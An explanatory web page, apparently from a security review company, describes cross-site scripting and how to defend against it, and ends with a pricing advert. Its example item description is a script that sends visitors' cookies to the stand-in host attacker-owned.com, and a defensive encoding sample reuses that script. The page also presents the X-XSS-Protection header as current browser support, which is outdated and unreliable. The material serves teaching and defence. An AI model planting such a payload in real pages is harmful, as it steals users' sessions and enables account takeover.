Cross-Site Scripting (XSS)

What is a Cross-Site Scripting Attack?

Cross-Site Scripting, also known as XSS, is a common vulnerability in web applications. It is typically found where an application accepts user input which is then presented to other users, such as a comment section.

Before displaying the user input to other users, the application needs to validate or encode it, in order to make sure that it does not contain any code that gets executed by the browser.

Failure to validate or encode the user input results in an XSS vulnerability that may be exploited by an attacker in order to obtain unrestricted access to cookies, session storage and the ability to modify the page being served. With these capabilities, the attacker can obtain sensitive information from users. Some attacks even exploit the user's browser to run cryptocurrency mining software that will run on the user's computer and earn money on behalf of the attacker.

An Example of a Vulnerability

In this example, a web site allows its users to sign in. When a user is signed in, they are remembered using a cookie stored on their computer.

Users that have signed in can sell items to other users. When putting a new item up for sale, a text field for entering a description of the item is available. An attacker signs in and puts a new item up for sale with the following description:

<script>
document.write('<img src="http://attacker-owned.com/?data=' + escape(document.cookie) + '" />');
</script>

The developers of the web site forgot to encode the item description. As soon as other users visit this item, their browsers will evaluate the item description as if it were code written by the developers of the web site.

In this case, for any user that visits this item, the contents of the cookie that was stored on their computer when they signed in are transmitted to the attacker's web server. The attacker can use this information to gain access to the other user accounts.

How To Defend Against Cross-Site Scripting Attacks

In order to avoid XSS vulnerabilities, the application must validate or encode user input anywhere that it is embedded into the page being served. Some frameworks, such as Ruby on Rails, now come with helpful configuration that will enable encoding by default. Even so, a complete security review of the application code is a recommended way to ensure the absence of vulnerabilities.
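As an added illustration (not code from the original page), the item page from the example above is rendered once without encoding and once with HTML encoding, using the description shown earlier as input. The names `encodeHtml`, `renderItemUnsafe`, `renderItemSafe`, `containsScriptTag` and the sample item are assumptions made for this sketch.

```javascript
// Added example: HTML-encode user input before embedding it in the page.
// All names and the sample item are hypothetical, constructed for illustration.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can change HTML structure.
// Valid for element content and quoted attribute values only; values placed
// inside <script> blocks, URLs or CSS need an encoder for that context.
function encodeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the description is concatenated into the markup unchanged,
// so the browser parses it as part of the site's own HTML.
function renderItemUnsafe(item) {
  return `<div class="item"><h2>${item.title}</h2><p>${item.description}</p></div>`;
}

// Hardened: every user-controlled field is encoded at the point of output.
function renderItemSafe(item) {
  return `<div class="item"><h2>${encodeHtml(item.title)}</h2>` +
         `<p>${encodeHtml(item.description)}</p></div>`;
}

// Review helper: does the rendered markup contain a live <script> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample: the item description from the example on this page.
const sampleItem = {
  title: 'Used bicycle',
  description: [
    '<script>',
    "document.write('<img src=\"http://attacker-owned.com/?data=' + escape(document.cookie) + '\" />');",
    '</script>',
  ].join('\n'),
};

console.log('unsafe render has <script>:', containsScriptTag(renderItemUnsafe(sampleItem)));
console.log('safe render has <script>:  ', containsScriptTag(renderItemSafe(sampleItem)));
```

With encoding applied, the description reaches the browser as text beginning `&lt;script&gt;`, which is displayed rather than executed.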

Additionally, major browsers now support an X-XSS-Protection header that helps protect users in the case of an XSS vulnerability. This should be considered a backup solution that does not eliminate the need for proper validation or encoding within the application.

These are some useful language-specific articles on the subject:

Let Us Review Your Software

We provide code security reviews as a service. Based on our extensive experience in the field of software engineering and IT security, we know how to efficiently review entire code bases and identify security-critical parts of the software.

This enables us to provide our security code review service at a fixed rate per review, providing our customers a transparent, efficient and reliable process.

Simple Pricing
  • Security review of your software by experts
  • OWASP Top 10 vulnerability check
  • Security Report with recommendations
  • Invaluable insights into the state of security in your application
  • Fixed Price per Review

    $5,000